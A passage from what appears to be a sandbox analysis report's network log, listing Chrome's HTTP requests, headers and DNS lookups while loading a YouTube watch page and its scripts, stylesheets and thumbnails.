                                    cookie: __Secure-YEC=CgtXWEt3X0hQX19sMCjh_5C8BjIKCgJHQhIEGgAgFA%3D%3D
                                    cookie: YSC=l9hGfoshAvA
                                    cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgFA%3D%3D
                                  • flag-gb
                                    GET
                                    https://www.youtube.com/s/desktop/b5305900/jsbin/webcomponents-sd.vflset/webcomponents-sd.js
                                    chrome.exe
                                    Remote address:
                                    172.217.169.78:443
                                    Request
                                    GET /s/desktop/b5305900/jsbin/webcomponents-sd.vflset/webcomponents-sd.js HTTP/2.0
                                    host: www.youtube.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-origin
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: script
                                    referer: https://www.youtube.com/watch?si=UxQ7X85fi_EYU85C&v=uL_USmYHfsA&feature=youtu.be
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-YEC=CgtXWEt3X0hQX19sMCjh_5C8BjIKCgJHQhIEGgAgFA%3D%3D
                                    cookie: YSC=l9hGfoshAvA
                                    cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgFA%3D%3D
                                  • flag-gb
                                    GET
                                    https://www.youtube.com/s/desktop/b5305900/jsbin/intersection-observer.min.vflset/intersection-observer.min.js
                                    chrome.exe
                                    Remote address:
                                    172.217.169.78:443
                                    Request
                                    GET /s/desktop/b5305900/jsbin/intersection-observer.min.vflset/intersection-observer.min.js HTTP/2.0
                                    host: www.youtube.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-origin
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: script
                                    referer: https://www.youtube.com/watch?si=UxQ7X85fi_EYU85C&v=uL_USmYHfsA&feature=youtu.be
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-YEC=CgtXWEt3X0hQX19sMCjh_5C8BjIKCgJHQhIEGgAgFA%3D%3D
                                    cookie: YSC=l9hGfoshAvA
                                    cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgFA%3D%3D
                                  • flag-gb
                                    GET
                                    https://www.youtube.com/s/player/3ede36f2/www-player.css
                                    chrome.exe
                                    Remote address:
                                    172.217.169.78:443
                                    Request
                                    GET /s/player/3ede36f2/www-player.css HTTP/2.0
                                    host: www.youtube.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: text/css,*/*;q=0.1
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-origin
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: style
                                    referer: https://www.youtube.com/watch?si=UxQ7X85fi_EYU85C&v=uL_USmYHfsA&feature=youtu.be
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-YEC=CgtXWEt3X0hQX19sMCjh_5C8BjIKCgJHQhIEGgAgFA%3D%3D
                                    cookie: YSC=l9hGfoshAvA
                                    cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgFA%3D%3D
                                  • flag-gb
                                    GET
                                    https://www.youtube.com/s/desktop/b5305900/cssbin/www-main-desktop-watch-page-skeleton.css
                                    chrome.exe
                                    Remote address:
                                    172.217.169.78:443
                                    Request
                                    GET /s/desktop/b5305900/cssbin/www-main-desktop-watch-page-skeleton.css HTTP/2.0
                                    host: www.youtube.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: text/css,*/*;q=0.1
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-origin
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: style
                                    referer: https://www.youtube.com/watch?si=UxQ7X85fi_EYU85C&v=uL_USmYHfsA&feature=youtu.be
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-YEC=CgtXWEt3X0hQX19sMCjh_5C8BjIKCgJHQhIEGgAgFA%3D%3D
                                    cookie: YSC=l9hGfoshAvA
                                    cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgFA%3D%3D
                                  • flag-gb
                                    GET
                                    https://www.youtube.com/s/desktop/b5305900/cssbin/www-main-desktop-player-skeleton.css
                                    chrome.exe
                                    Remote address:
                                    172.217.169.78:443
                                    Request
                                    GET /s/desktop/b5305900/cssbin/www-main-desktop-player-skeleton.css HTTP/2.0
                                    host: www.youtube.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: text/css,*/*;q=0.1
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-origin
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: style
                                    referer: https://www.youtube.com/watch?si=UxQ7X85fi_EYU85C&v=uL_USmYHfsA&feature=youtu.be
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-YEC=CgtXWEt3X0hQX19sMCjh_5C8BjIKCgJHQhIEGgAgFA%3D%3D
                                    cookie: YSC=l9hGfoshAvA
                                    cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgFA%3D%3D
                                  • flag-gb
                                    GET
                                    https://www.youtube.com/s/desktop/b5305900/cssbin/www-onepick.css
                                    chrome.exe
                                    Remote address:
                                    172.217.169.78:443
                                    Request
                                    GET /s/desktop/b5305900/cssbin/www-onepick.css HTTP/2.0
                                    host: www.youtube.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: text/css,*/*;q=0.1
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-origin
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: style
                                    referer: https://www.youtube.com/watch?si=UxQ7X85fi_EYU85C&v=uL_USmYHfsA&feature=youtu.be
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-YEC=CgtXWEt3X0hQX19sMCjh_5C8BjIKCgJHQhIEGgAgFA%3D%3D
                                    cookie: YSC=l9hGfoshAvA
                                    cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgFA%3D%3D
                                  • flag-gb
                                    GET
                                    https://www.youtube.com/s/desktop/b5305900/jsbin/scheduler.vflset/scheduler.js
                                    chrome.exe
                                    Remote address:
                                    172.217.169.78:443
                                    Request
                                    GET /s/desktop/b5305900/jsbin/scheduler.vflset/scheduler.js HTTP/2.0
                                    host: www.youtube.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-origin
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: script
                                    referer: https://www.youtube.com/watch?si=UxQ7X85fi_EYU85C&v=uL_USmYHfsA&feature=youtu.be
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-YEC=CgtXWEt3X0hQX19sMCjh_5C8BjIKCgJHQhIEGgAgFA%3D%3D
                                    cookie: YSC=l9hGfoshAvA
                                    cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgFA%3D%3D
                                  • flag-gb
                                    GET
                                    https://www.youtube.com/s/desktop/b5305900/jsbin/www-i18n-constants-en_US.vflset/www-i18n-constants.js
                                    chrome.exe
                                    Remote address:
                                    172.217.169.78:443
                                    Request
                                    GET /s/desktop/b5305900/jsbin/www-i18n-constants-en_US.vflset/www-i18n-constants.js HTTP/2.0
                                    host: www.youtube.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-origin
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: script
                                    referer: https://www.youtube.com/watch?si=UxQ7X85fi_EYU85C&v=uL_USmYHfsA&feature=youtu.be
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-YEC=CgtXWEt3X0hQX19sMCjh_5C8BjIKCgJHQhIEGgAgFA%3D%3D
                                    cookie: YSC=l9hGfoshAvA
                                    cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgFA%3D%3D
                                  • flag-gb
                                    GET
                                    https://www.youtube.com/s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.7hiJwkXlKs8.L.B1.O/am=AABBAg/d=0/br=1/rs=AGKMywGGJrddI2OdqQpm3Rz8uCoVK9lqTQ
                                    chrome.exe
                                    Remote address:
                                    172.217.169.78:443
                                    Request
                                    GET /s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.7hiJwkXlKs8.L.B1.O/am=AABBAg/d=0/br=1/rs=AGKMywGGJrddI2OdqQpm3Rz8uCoVK9lqTQ HTTP/2.0
                                    host: www.youtube.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: text/css,*/*;q=0.1
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-origin
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: style
                                    referer: https://www.youtube.com/watch?si=UxQ7X85fi_EYU85C&v=uL_USmYHfsA&feature=youtu.be
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-YEC=CgtXWEt3X0hQX19sMCjh_5C8BjIKCgJHQhIEGgAgFA%3D%3D
                                    cookie: YSC=l9hGfoshAvA
                                    cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgFA%3D%3D
                                  • flag-gb
                                    GET
                                    https://www.youtube.com/s/desktop/b5305900/jsbin/spf.vflset/spf.js
                                    chrome.exe
                                    Remote address:
                                    172.217.169.78:443
                                    Request
                                    GET /s/desktop/b5305900/jsbin/spf.vflset/spf.js HTTP/2.0
                                    host: www.youtube.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-origin
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: script
                                    referer: https://www.youtube.com/watch?si=UxQ7X85fi_EYU85C&v=uL_USmYHfsA&feature=youtu.be
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-YEC=CgtXWEt3X0hQX19sMCjh_5C8BjIKCgJHQhIEGgAgFA%3D%3D
                                    cookie: YSC=l9hGfoshAvA
                                    cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgFA%3D%3D
                                  • flag-gb
                                    GET
                                    https://www.youtube.com/s/desktop/b5305900/jsbin/network.vflset/network.js
                                    chrome.exe
                                    Remote address:
                                    172.217.169.78:443
                                    Request
                                    GET /s/desktop/b5305900/jsbin/network.vflset/network.js HTTP/2.0
                                    host: www.youtube.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-origin
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: script
                                    referer: https://www.youtube.com/watch?si=UxQ7X85fi_EYU85C&v=uL_USmYHfsA&feature=youtu.be
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-YEC=CgtXWEt3X0hQX19sMCjh_5C8BjIKCgJHQhIEGgAgFA%3D%3D
                                    cookie: YSC=l9hGfoshAvA
                                    cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgFA%3D%3D
                                  • flag-us
                                    DNS
                                    i.ytimg.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    i.ytimg.com
                                    IN A
                                    Response
                                    i.ytimg.com
                                    IN A
                                    216.58.201.118
                                    i.ytimg.com
                                    IN A
                                    172.217.169.86
                                    i.ytimg.com
                                    IN A
                                    142.250.180.22
                                    i.ytimg.com
                                    IN A
                                    216.58.204.86
                                    i.ytimg.com
                                    IN A
                                    216.58.212.214
                                    i.ytimg.com
                                    IN A
                                    172.217.169.22
                                    i.ytimg.com
                                    IN A
                                    216.58.213.22
                                    i.ytimg.com
                                    IN A
                                    142.250.200.22
                                    i.ytimg.com
                                    IN A
                                    142.250.178.22
                                    i.ytimg.com
                                    IN A
                                    142.250.187.246
                                    i.ytimg.com
                                    IN A
                                    172.217.169.54
                                    i.ytimg.com
                                    IN A
                                    142.250.200.54
                                    i.ytimg.com
                                    IN A
                                    142.250.187.214
                                    i.ytimg.com
                                    IN A
                                    172.217.16.246
                                    i.ytimg.com
                                    IN A
                                    142.250.179.246
                                  • flag-us
                                    DNS
                                    rr2---sn-5hnekn7s.googlevideo.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    rr2---sn-5hnekn7s.googlevideo.com
                                    IN A
                                    Response
                                    rr2---sn-5hnekn7s.googlevideo.com
                                    IN CNAME
                                    rr2.sn-5hnekn7s.googlevideo.com
                                    rr2.sn-5hnekn7s.googlevideo.com
                                    IN A
                                    74.125.100.39
                                  • flag-us
                                    DNS
                                    10.213.58.216.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    10.213.58.216.in-addr.arpa
                                    IN PTR
                                    Response
                                    10.213.58.216.in-addr.arpa
                                    IN PTR
                                    ber01s14-in-f101e100net
                                    10.213.58.216.in-addr.arpa
                                    IN PTR
                                    lhr25s25-in-f10�H
                                  • flag-us
                                    DNS
                                    14.180.250.142.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    14.180.250.142.in-addr.arpa
                                    IN PTR
                                    Response
                                    14.180.250.142.in-addr.arpa
                                    IN PTR
                                    lhr25s32-in-f141e100net
                                  • flag-us
                                    DNS
                                    78.169.217.172.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    78.169.217.172.in-addr.arpa
                                    IN PTR
                                    Response
                                    78.169.217.172.in-addr.arpa
                                    IN PTR
                                    lhr48s09-in-f141e100net
                                  • flag-gb
                                    GET
                                    https://i.ytimg.com/generate_204
                                    chrome.exe
                                    Remote address:
                                    216.58.201.118:443
                                    Request
                                    GET /generate_204 HTTP/2.0
                                    host: i.ytimg.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: empty
                                    referer: https://www.youtube.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    Response
                                    HTTP/2.0 200
                                    accept-ranges: bytes
                                    content-type: image/jpeg
                                    vary: Origin
                                    content-type: image/jpeg
                                    cross-origin-opener-policy-report-only: same-origin; report-to="youtube"
                                    report-to: {"group":"youtube","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube"}]}
                                    timing-allow-origin: *
                                    content-length: 17985
                                    date: Sun, 12 Jan 2025 22:19:13 GMT
                                    expires: Mon, 13 Jan 2025 00:19:13 GMT
                                    cache-control: public, max-age=7200
                                    etag: "1732966101"
                                    x-content-type-options: nosniff
                                    server: sffe
                                    x-xss-protection: 0
                                    vary: Origin
                                  • flag-gb
                                    GET
                                    https://i.ytimg.com/vi/uL_USmYHfsA/hqdefault.jpg
                                    chrome.exe
                                    Remote address:
                                    216.58.201.118:443
                                    Request
                                    GET /vi/uL_USmYHfsA/hqdefault.jpg HTTP/2.0
                                    host: i.ytimg.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: image
                                    referer: https://www.youtube.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-gb
                                    GET
                                    https://i.ytimg.com/vi/t3g84irdNns/hqdefault.jpg?sqp=-oaymwEmCKgBEF5IWvKriqkDGQgBFQAAiEIYAdgBAeIBCggYEAIYBjgBQAE=&rs=AOn4CLDQgAZ7K00oK0sIDPZ_EyRHoEiu3w
                                    chrome.exe
                                    Remote address:
                                    216.58.201.118:443
                                    Request
                                    GET /vi/t3g84irdNns/hqdefault.jpg?sqp=-oaymwEmCKgBEF5IWvKriqkDGQgBFQAAiEIYAdgBAeIBCggYEAIYBjgBQAE=&rs=AOn4CLDQgAZ7K00oK0sIDPZ_EyRHoEiu3w HTTP/2.0
                                    host: i.ytimg.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: image
                                    referer: https://www.youtube.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-nl
                                    GET
                                    https://rr2---sn-5hnekn7s.googlevideo.com/generate_204?conn2
                                    chrome.exe
                                    Remote address:
                                    74.125.100.39:443
                                    Request
                                    GET /generate_204?conn2 HTTP/1.1
                                    Host: rr2---sn-5hnekn7s.googlevideo.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    X-Client-Data: CM2QywE=
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: empty
                                    Referer: https://www.youtube.com/
                                    Accept-Encoding: gzip, deflate, br, zstd
                                    Accept-Language: en-US,en;q=0.9
                                    Response
                                    HTTP/1.1 204 No Content
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,quic=":443"; ma=2592000; v="46"
                                    Server: gvs 1.0
                                    Date: Sun, 12 Jan 2025 22:19:13 GMT
                                    X-Frame-Options: SAMEORIGIN
                                    X-XSS-Protection: 0
                                    Content-Length: 0
                                  • flag-nl
                                    GET
                                    https://rr2---sn-5hnekn7s.googlevideo.com/generate_204
                                    chrome.exe
                                    Remote address:
                                    74.125.100.39:443
                                    Request
                                    GET /generate_204 HTTP/1.1
                                    Host: rr2---sn-5hnekn7s.googlevideo.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    X-Client-Data: CM2QywE=
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: empty
                                    Referer: https://www.youtube.com/
                                    Accept-Encoding: gzip, deflate, br, zstd
                                    Accept-Language: en-US,en;q=0.9
                                    Response
                                    HTTP/1.1 204 No Content
